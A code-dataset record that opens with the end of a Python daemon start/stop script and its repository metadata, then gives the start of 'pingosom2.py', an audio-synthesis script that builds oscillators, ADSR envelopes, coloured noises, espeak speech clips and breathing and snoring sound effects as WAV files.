signal_map={
signal.SIGTERM: sigterm,
signal.SIGINT: sigterm,
},
)
def start():
"""
Запуск серера
"""
logging.info('Start OpenRE.Agent domain')
agent = Agent(vars(args))
agent.run()
def stop():
"""
Остановка серера
"""
logging.info('Stop OpenRE.Agent domain')
daemon_stop(args.pid_file)
if args.action == 'start':
start()
elif args.action == 'stop':
stop()
elif args.action == 'restart':
stop()
start()
|
mit
| -6,384,374,142,818,930,000
| 24.413793
| 74
| 0.580054
| false
| 3.096639
| false
| false
| false
|
ttm/pingosom
|
pingosom2.py
|
1
|
50613
|
#-*- coding: utf-8 -*-
import numpy as n, random, os, sys, time
from scipy.io import wavfile as w
tfoo=time.time()
H=n.hstack
V=n.vstack
f_a = 44100. # Hz, frequência de amostragem
############## 2.2.1 Tabela de busca (LUT)
Lambda_tilde=Lt=1024.*16
# Senoide
fooXY=n.linspace(0,2*n.pi,Lt,endpoint=False)
S_i=n.sin(fooXY) # um período da senóide com T amostras
# Quadrada:
Q_i=n.hstack( ( n.ones(Lt/2)*-1 , n.ones(Lt/2) ) )
# Triangular:
foo=n.linspace(-1,1,Lt/2,endpoint=False)
Tr_i=n.hstack( ( foo , foo*-1 ) )
# Dente de Serra:
D_i=n.linspace(-1,1,Lt)
def v(f=220,d=2.,tab=S_i,fv=2.,nu=2.,tabv=S_i):
if nu==13.789987:
return n.zeros(int(fa*d))
Lambda=n.floor(f_a*d)
ii=n.arange(Lambda)
Lv=float(len(tabv))
Gammav_i=n.floor((ii*fv*Lv)/f_a) # índices para a LUT
Gammav_i=n.array(Gammav_i,n.int)
# padrão de variação do vibrato para cada amostra
Tv_i=tabv[Gammav_i%int(Lv)]
# frequência em Hz em cada amostra
F_i=f*( 2.**( Tv_i*nu/12. ) )
# a movimentação na tabela por amostra
D_gamma_i=F_i*(Lt/float(f_a))
Gamma_i=n.cumsum(D_gamma_i) # a movimentação na tabela total
Gamma_i=n.floor( Gamma_i) # já os índices
Gamma_i=n.array( Gamma_i, dtype=n.int) # já os índices
return tab[Gamma_i%int(Lt)] # busca dos índices na tabela
def A(fa=2.,V_dB=10.,d=2.,taba=S_i):
# Use com: v(d=XXX)*A(d=XXX)
Lambda=n.floor(f_a*d)
ii=n.arange(Lambda)
Lt=float(len(taba))
Gammaa_i=n.floor(ii*fa*Lt/f_a) # índices para a LUT
Gammaa_i=n.array(Gammaa_i,n.int)
# variação da amplitude em cada amostra
A_i=taba[Gammaa_i%int(Lt)]
A_i=1+A_i*(1- 10.**(V_dB/20.))
return A_i
def adsr(som,A=10.,D=20.,S=-20.,R=100.,xi=1e-2):
"""Envelope ADSR com
A ataque em milissegundos,
D decay em milissegundos
S sustain, com número de decibéis a menos
R Release em milisegundos
Atenção para que a duração total é dada pelo som em si
e que a duração do trecho em sustain é a diferença
entre a duração total e as durações das partes ADR."""
a_S=10**(S/20.)
Lambda=len(som)
Lambda_A=int(A*f_a*0.001)
Lambda_D=int(D*f_a*0.001)
Lambda_R=int(R*f_a*0.001)
Lambda_S=Lambda - Lambda_A - Lambda_D - Lambda_R
ii=n.arange(Lambda_A,dtype=n.float)
A=ii/(Lambda_A-1)
A_i=A # ok
ii=n.arange(Lambda_A,Lambda_D+Lambda_A,dtype=n.float)
D=1-(1-a_S)*( ( ii-Lambda_A )/( Lambda_D-1) )
A_i=n.hstack( (A_i, D ) )
S=n.ones(Lambda-Lambda_R-(Lambda_A+Lambda_D),dtype=n.float)*a_S
A_i=n.hstack( ( A_i, S ) )
ii=n.arange(Lambda-Lambda_R,Lambda,dtype=n.float)
R=a_S-a_S*((ii-(Lambda-Lambda_R))/(Lambda_R-1))
A_i=n.hstack( (A_i,R) )
return som*A_i
triadeM=[0.,4.,7.]
def ac(f=220.,notas=[0.,4.,7.,12.],tab=Q_i,d=2.,nu=0,fv=2.):
acorde=adsr(v(tab=tab,d=d,f=f*2.**(notas[-1]/12.),nu=nu,fv=fv))
for na in notas[:-1]:
acorde+=adsr(v(tab=tab,d=d,f=f*2**(na/12.),nu=nu,fv=fv))
return acorde*10
def N(arr,xx=1.):
r=arr
r = (((r-r.min())/(r.max()-r.min()))*2-1)*xx
return n.int16(r * float(2**15-1))
def NN(arr):
return 2*((arr-arr.min())/(arr.max()-arr.min()))-1
vozes="f3,f2,f1,f5,m5,m1,m3".split(",")
def fala(frase="Semicondutor livre",ss=160):
arq=frase.split()[0]
#os.system("espeak -vpt-pt+%s -w%s.wav -g110 -p99 -s110 -b=1 '%s'"%(random.sample(vozes,1)[0],arq,frase))
os.system(u"espeak -vpt-pt+%s -w%s.wav -p99 -b=1 '%s' -s%i"%(random.sample(vozes,1)[0],arq,frase,ss))
#os.system(u"espeak "+ frase +(u" -vpt-pt+%s -w%s.wav -p99 -b=1 -s%i"%(random.sample(vozes,1)[0],arq,ss)))
#os.system("espeak -vpt-pt+%s -w%s.wav -g110 -p99 -s130 -b=1 '%s'"%(random.sample(vozes,1)[0],arq,frase))
ff=w.read("%s.wav"%(arq,))[1]
ff_=n.fft.fft(ff)
s=ff2=n.fft.ifft( n.hstack((ff_,n.zeros(len(ff_)) )) ).real
sc_aud=((s-s.min())/(s.max()-s.min()))*2.-1.
return sc_aud*10
####
# ruidos
Lambda = 100000 # Lambda sempre par
# diferença das frequências entre coeficiêntes vizinhos:
df = f_a/float(Lambda)
coefs = n.exp(1j*n.random.uniform(0, 2*n.pi, Lambda))
# real par, imaginaria impar
coefs[Lambda/2+1:] = n.real(coefs[1:Lambda/2])[::-1] - 1j * \
n.imag(coefs[1:Lambda/2])[::-1]
coefs[0] = 0. # sem bias
coefs[Lambda/2] = 1. # freq max eh real simplesmente
# as frequências relativas a cada coeficiente
# acima de Lambda/2 nao vale
fi = n.arange(coefs.shape[0])*df
f0 = 15. # iniciamos o ruido em 15 Hz
i0 = n.floor(f0/df) # primeiro coef a valer
coefs[:i0] = n.zeros(i0)
f0 = fi[i0]
# obtenção do ruído em suas amostras temporais
ruido = n.fft.ifft(coefs)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rb=r
r = n.int16(r * float(2**15-1))
w.write('branco.wav', f_a, r)
fator = 10.**(-6/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = c[i0:]*alphai
# real par, imaginaria impar
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
# realizando amostras temporais do ruído marrom
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rm=r
r = n.int16(r * float(2**15-1))
w.write('marrom.wav', f_a, r)
### 2.53 Ruído azul
# para cada oitava, ganhamos 3dB
fator = 10.**(3/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = c[i0:]*alphai
# real par, imaginaria impar
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
# realizando amostras temporais do ruído azul
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
ra=r
r = n.int16(r * float(2**15-1))
w.write('azul.wav', f_a, r)
### 2.54 Ruido violeta
# a cada oitava, ganhamos 6dB
fator = 10.**(6/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = c[i0:]*alphai
# real par, imaginaria impar
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rv=r
r = n.int16(r * float(2**15-1))
w.write('violeta.wav', f_a, r)
### 2.51 Ruído rosa
# a cada oitava, perde-se 3dB
fator = 10.**(-3/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = coefs[i0:]*alphai
# real par, imaginaria impar
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rr=r
r = n.int16(r * float(2**15-1))
w.write('rosa.wav', f_a, r)
fator = 10.**(-9/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = c[i0:]*alphai
# real par, imaginaria impar
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
# realizando amostras temporais do ruído marrom
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rp=r
r = n.int16(r * float(2**15-1))
w.write('preto.wav', f_a, r)
#w.write('respira.wav', f_a, N(H((
# rr[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# rr[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# rr[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# ))))
#
#w.write('respira2.wav', f_a, N(H((
# rp[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# rp[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# rp[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# ))))
#
#
#w.write('respira3.wav', f_a, N(H((
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# 5.*adsr(rm[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# 5.*adsr(rm[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# 5.*adsr(rm[:int(f_a*.5)],S=-.5,A=360.),
# ))))
#
#
#w.write('respira4.wav', f_a, N(H((
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rb[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rb[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rb[:int(f_a*.5)],S=-.5,A=360.),
# ))))
#
#
#w.write('respira5.wav', f_a, N(H((
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rv[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rv[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rv[:int(f_a*.5)],S=-.5,A=360.),
# ))))
#
#
#w.write('respira6.wav', f_a, N(H((
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# ))))
#
#
#f0=110.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca.wav', f_a, N(H((
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# ))))
#
#
#
#f0=1100.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca2.wav', f_a, N(H((
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# ))))
#
#
#
#f0=11000.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca3.wav', f_a, N(H((
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# ))))
#
#
#
#f0=410.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=adsr(v(f=ff,d=4.,nu=0.)*a_,S=-5.)
#
#w.write('pisca4.wav', f_a, N(H((
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# ))))
##### PISCA TTMPPC
#f0=110.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca_.wav', f_a, N(H((
# s[:f_a/8], n.zeros(f_a/2),
# ))))
#
#
#
#f0=1100.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca2_.wav', f_a, N(H((
# s[:f_a/8], n.zeros(f_a/2),
# ))))
#
#
#
#f0=11000.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca3_.wav', f_a, N(H((
# s[:f_a/8], n.zeros(f_a/2),
# ))))
#
#
#
#f0=410.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=adsr(v(f=ff,d=4.,nu=0.)*a_,S=-5.)
#
#w.write('pisca4_.wav', f_a, N(H((
# s[:f_a/8], n.zeros(f_a/2),
# ))))
#
##### END TTMPPC
w.write('comendo6.wav', f_a, N(fala("O melhor que voce faz com a sua boca, eh servir de toca, para outra cabessa. Nao que voce meressa, esta oportunidade, que vem com a idade, de se curtir em mim.",ss=3500)))
w.write('comendo7.wav', f_a, N(fala("Diga aonde voce vai, que eu vou varrendo, diga aonda voce vai, que eu vou varrendo. Vou varrendo, vou varrendo vou varrendo. Vou varrendo, vou varrendo, vou varrendo.",ss=3500)))
#
#
#w.write('comendo.wav', f_a, N(fala("mahnamnahamhahamnahamhanhamnanhnahamha")))
#w.write('comendo2.wav', f_a, N(fala("manamnaamaamnaamanamnannaama")))
#w.write('comendo3.wav', f_a, N(fala("mnmnmmnmnmnnnm")))
#w.write('comendo4.wav', f_a, N(fala("mnmnmm nmnm nn nmnmnmn")))
#w.write('comendo5.wav', f_a, N(fala("mnhmnhmm nhmhnm nn nhmhnmhnhmn")))
#
#
#w.write('chorando_.wav', f_a, N(fala("bbbbuaaa bbbbbuaaa bbbbuaaa bbbuaaa")))
#
#
#w.write('chorando_2.wav', f_a, N(fala("buaaa bbuaaa buaaa buaaa")))
#
#
#
#w.write('chorando_3.wav', f_a, N(fala("buaaa nheee ee ee nheeee e eeeee bbuaaa buaaa nheeeee eee eeeee buaaa")))
#
#
#w.write('chorando_4.wav', f_a, N(fala("buaaa nheee ee hhh hhh hhh ee nheeehhhh h hh hhe e eeeee bbuhhh h hh haaa buaaa nhhhh hhh eeeee eee hhhhhh h heeeee buaaa")))
#
w.write('coma.wav', f_a, N(H((
v(f=1000.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
)),.3))
w.write('coma2.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
)),.3))
w.write('coma3.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
)),.3))
w.write('coma4.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*0.1)), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*0.1)), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*0.1)), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*0.1)), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
)),.3))
w.write('coma5.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*1.5)),
)),.3))
w.write('coma6.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*2.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*2.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*2.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*2.5)),
)),.3))
w.write('coma7.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*3.5)),
)),.3))
w.write('coma8.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=2.,d=0.1,tab=Tr_i), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=2.,d=0.1,tab=Tr_i), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=2.,d=0.1,tab=Tr_i), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=2.,d=0.1,tab=Tr_i), n.zeros(int(f_a*3.5)),
)),.3))
w.write('respira7.wav', f_a, N(H((
adsr(rr[ :int(f_a*1.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*1.5)],S=-.5,A=360.),
adsr(rr[ :int(f_a*1.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*1.5)],S=-.5,A=360.),
adsr(rr[ :int(f_a*1.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*1.5)],S=-.5,A=360.),
))))
w.write('respira8.wav', f_a, N(H((
adsr(rr[ :int(f_a*2.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*2.5)],S=-.5,A=360.),
adsr(rr[ :int(f_a*2.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*2.5)],S=-.5,A=360.),
adsr(rr[ :int(f_a*2.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*2.5)],S=-.5,A=360.),
))))
w.write('respira9.wav', f_a, N(H((
adsr(rr[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(rr[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(rr[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
))))
w.write('respira91.wav', f_a, N(H((
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
))))
w.write('respira92.wav', f_a, N(H((
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
))))
w.write('dormindo.wav', f_a, N(H((
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
))))
# arroto3 arroto6 arroto 9 92
w.write('dormindo2.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
))))
w.write('dormindo2.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
))))
ronco=H((
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
))
w.write('dormindo3.wav', f_a, N(H((
ronco,n.zeros(f_a),
ronco,n.zeros(f_a),
ronco,n.zeros(f_a),
ronco,n.zeros(f_a),
ronco,n.zeros(f_a),
))))
w.write('dormindo4.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),ronco,n.zeros(f_a),
))))
w.write('dormindo5.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
))))
w.write('dormindo6.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
))))
w.write('dormindo7.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
))))
ronco2=H((
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
))
w.write('dormindo8.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
))))
w.write('dormindo9.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
